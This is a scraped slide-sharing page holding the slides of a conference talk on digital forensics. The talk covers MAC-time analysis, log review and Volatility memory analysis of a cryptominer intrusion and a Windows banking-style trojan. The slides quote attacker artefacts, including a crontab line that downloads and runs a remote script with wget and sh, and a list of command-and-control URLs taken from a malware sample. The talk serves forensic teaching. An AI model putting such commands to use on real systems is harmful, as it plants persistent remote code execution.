Approach and Philosophy of On baking technology
30anthuong17
 
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PPTX
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
August Patch Tuesday
Ivanti
 
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
Teaching material agriculture food technology
LiaRayya
 
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
Approach and Philosophy of On baking technology
30anthuong17
 
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
A Presentation on Artificial Intelligence
memembruh336
 
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 

Adventures in Digital Forensics

  • 2. xhr Easterhegg 2014 2 $ whoami
  • 3. xhr Easterhegg 2014 3 What is Digital Forensics?
  • 4. xhr Easterhegg 2014 4 What the media thinks...
  • 5. xhr Easterhegg 2014 5 + Flickr. West Midlands Police. CC-BY-2.0
  • 6. xhr Easterhegg 2014 6 What it is really about ...
  • 7. xhr Easterhegg 2014 7 Flickr. Naughty Architect. CC-BY-2.0
  • 8. xhr Easterhegg 2014 8 Srsly? Crawling a Shitload of Data * Hey, that's cool. It's Big Data[TM] !!1 *
  • 9. xhr Easterhegg 2014 9 Discover unknown malware * sadly, known as well :/ *
  • 10. xhr Easterhegg 2014 11 Learn new Things[TM]
  • 11. xhr Easterhegg 2014 12 Two Approaches
  • 12. xhr Easterhegg 2014 13 Disc Forensics
  • 13. xhr Easterhegg 2014 14 Memory Forensics
  • 14. xhr Easterhegg 2014 15 Post-mortem Analysis
  • 15. xhr Easterhegg 2014 16 MAC Time Analysis
  • 16. xhr Easterhegg 2014 17 Tim e stam pM AC User Perm issions Path Size Time Last Modified Last Accessed Last Changed Birth time
  • 17. xhr Easterhegg 2014 18 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
  • 18. xhr Easterhegg 2014 19 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
  • 19. xhr Easterhegg 2014 20 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
  • 20. xhr Easterhegg 2014 21 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
  • 21. xhr Easterhegg 2014 22 On-disk Analysis
  • 22. xhr Easterhegg 2014 23 host:/tmp/.ICE­unix/­log# ls ­l total 5088 ­rw­r­­r­­  1 www­data www­data     238 Dec 17 16:26   drwxr­xr­x  2 www­data www­data    4096 Dec 15 04:01 bin ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.1 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.2 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.3 drwxr­xr­x  3 www­data www­data      22 Dec 14 12:41 doc drwxr­xr­x  5 www­data www­data     126 Dec 15 04:01 include drwxr­xr­x  4 www­data www­data    4096 Dec 17 16:26 lib drwxr­xr­x  3 www­data www­data      17 Dec 14 12:41 man ­rwxr­xr­x  1 www­data www­data       0 Dec 14 03:24 rsyslogd ­rw­r­­r­­  1 www­data www­data 3077358 Dec 16 16:53 sshc.tgz drwxr­xr­x  6 www­data www­data      71 Dec 15 03:53 ssl
  • 23. xhr Easterhegg 2014 24 Crontab FTW! @weekly wget ­q hxxp://221.132.37.XX/scen  ­O /tmp/sh; sh /tmp/sh; rm ­rd /tmp/sh
  • 24. xhr Easterhegg 2014 25 Log Files
  • 25. xhr Easterhegg 2014 26 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 26. xhr Easterhegg 2014 27 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 27. xhr Easterhegg 2014 28 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 28. xhr Easterhegg 2014 29 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 29. xhr Easterhegg 2014 30 Write Remote Logs!!1
  • 30. xhr Easterhegg 2014 31 And use Smart Indexing loghost:/syslog/live $ du -hs 4.5T . :)
  • 31. xhr Easterhegg 2014 32 Memory Forensics 101
  • 32. xhr Easterhegg 2014 33 Mem dump == IDDQD
  • 33. xhr Easterhegg 2014 34 Linux → Windows
  • 34. xhr Easterhegg 2014 35 Details about the Victim Determining profile based on KDBG search...           Suggested Profile(s) : WinXPSP2x86,  WinXPSP3x86 (Instantiated with WinXPSP2x86)                       PAE type : PAE                            DTB : 0x28a000L                           KDBG : 0x80545ce0           Number of Processors : 1      Image Type (Service Pack) : 3 $ file ram.elf  ram.elf: ELF 64­bit LSB core file x86­64,  version 1 (SYSV) $ ls ­l ram.elf  293M ­rw­­­­­­­ 1 xhr xhr 293M Apr 19 15:29  ram.elf
  • 35. xhr Easterhegg 2014 36 Check Networking
  • 36. xhr Easterhegg 2014 37 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
  • 37. xhr Easterhegg 2014 38 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
  • 38. xhr Easterhegg 2014 39 Check IE History
  • 39. xhr Easterhegg 2014 40 admin@about:Home admin@http://127.0.0.1:1088/app/index.html admin@http://ccc.de admin@http://ccc.de/de/rss/updates.rdf admin@http://ccc.de/de/rss/updates.xml admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0| 1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://go.microsoft.com/fwlink/?LinkID=121792 admin@http://home.microsoft.com admin@https://download­installer.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en­ US/Firefox%20Setup%20Stub%2026.0.exe admin@http://update.microsoft.com/favicon.ico admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en­us admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=en­us&id=6 admin@http://windowsupdate.microsoft.com/favicon.ico admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=en­us admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en­ us&id=6 admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=en­us&page=8 admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome admin@http://www.mozilla.org/en­US admin@http://www.mozilla.org/en­US/products/download.html?product=firefox­ stub&os=win&lang=en­US admin@http://www.msn.com admin@http://www.youporn.com/rss admin@res://ief admin@res://ieframe.dll/tabswelcome.htm
  • 40. xhr Easterhegg 2014 42 Any Malicious Processes?
  • 41. xhr Easterhegg 2014 43 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
  • 42. xhr Easterhegg 2014 44 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
  • 43. xhr Easterhegg 2014 45 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324     10      435  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      939  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81887620 KB01065453.exe         3564   1156      1       15 
  • 44. xhr Easterhegg 2014 46 Process Dump
  • 46. xhr Easterhegg 2014 48 Putting it into IDA Pro * Having a Pro license totally rocks :) *
  • 47. xhr Easterhegg 2014 49 Detailz kthxbye! 000000011410   000000411410      0   http://113.130.65.77:8080/mx5/C/in/ 000000011458   000000411458      0   http://199.71.212.78:8080/mx5/C/in/ 0000000114A0   0000004114A0      0   http://211.191.168.98:8080/mx5/C/in/ 0000000114F0   0000004114F0      0   http://195.250.139.10:8080/mx5/C/in/ 000000011540   000000411540      0   http://173.224.208.60:8080/mx5/C/in/ 000000011590   000000411590      0   http://46.51.218.71:8080/mx5/C/in/ 0000000115D8   0000004115D8      0   http://89.97.55.33:8080/mx5/C/in/ 000000011620   000000411620      0   http://71.89.140.153:8080/mx5/C/in/ 000000011668   000000411668      0   http://195.111.72.46:8080/mx5/C/in/ 0000000116B0   0000004116B0      0   http://84.53.217.109:8080/mx5/C/in/ 0000000116F8   0000004116F8      0   http://78.46.64.17:8080/mx5/C/in/ 0000000111F8   0000004111F8      0   SoftwareMicrosoftWindows NTC%08X 000000011254   000000411254      0   MozillaFirefoxProfiles 000000011288   000000411288      0   cookies.* 00000001129C   00000041129C      0   Macromedia 0000000112BC   0000004112BC      0   firefox.exe 0000000112D4   0000004112D4      0   explorer.exe 000000011C60   000000411C60      0   SoftwareMicrosoftWindows NTS%08X 000000011CEB   000000411CEB      0   sKB%08d.exe 000000011D08   000000411D08      0   SoftwareMicrosoftWindowsCurrentVersionRun
  • 48. xhr Easterhegg 2014 50 Selected Tools
  • 49. xhr Easterhegg 2014 51 The Sleuth Kit http://www.sleuthkit.org
  • 50. xhr Easterhegg 2014 52 The Volatility Framework https://code.google.com/p/volatility/
  • 52. xhr Easterhegg 2014 54 Q & A xhr xhr giessen.ccc.de @ @_xhr_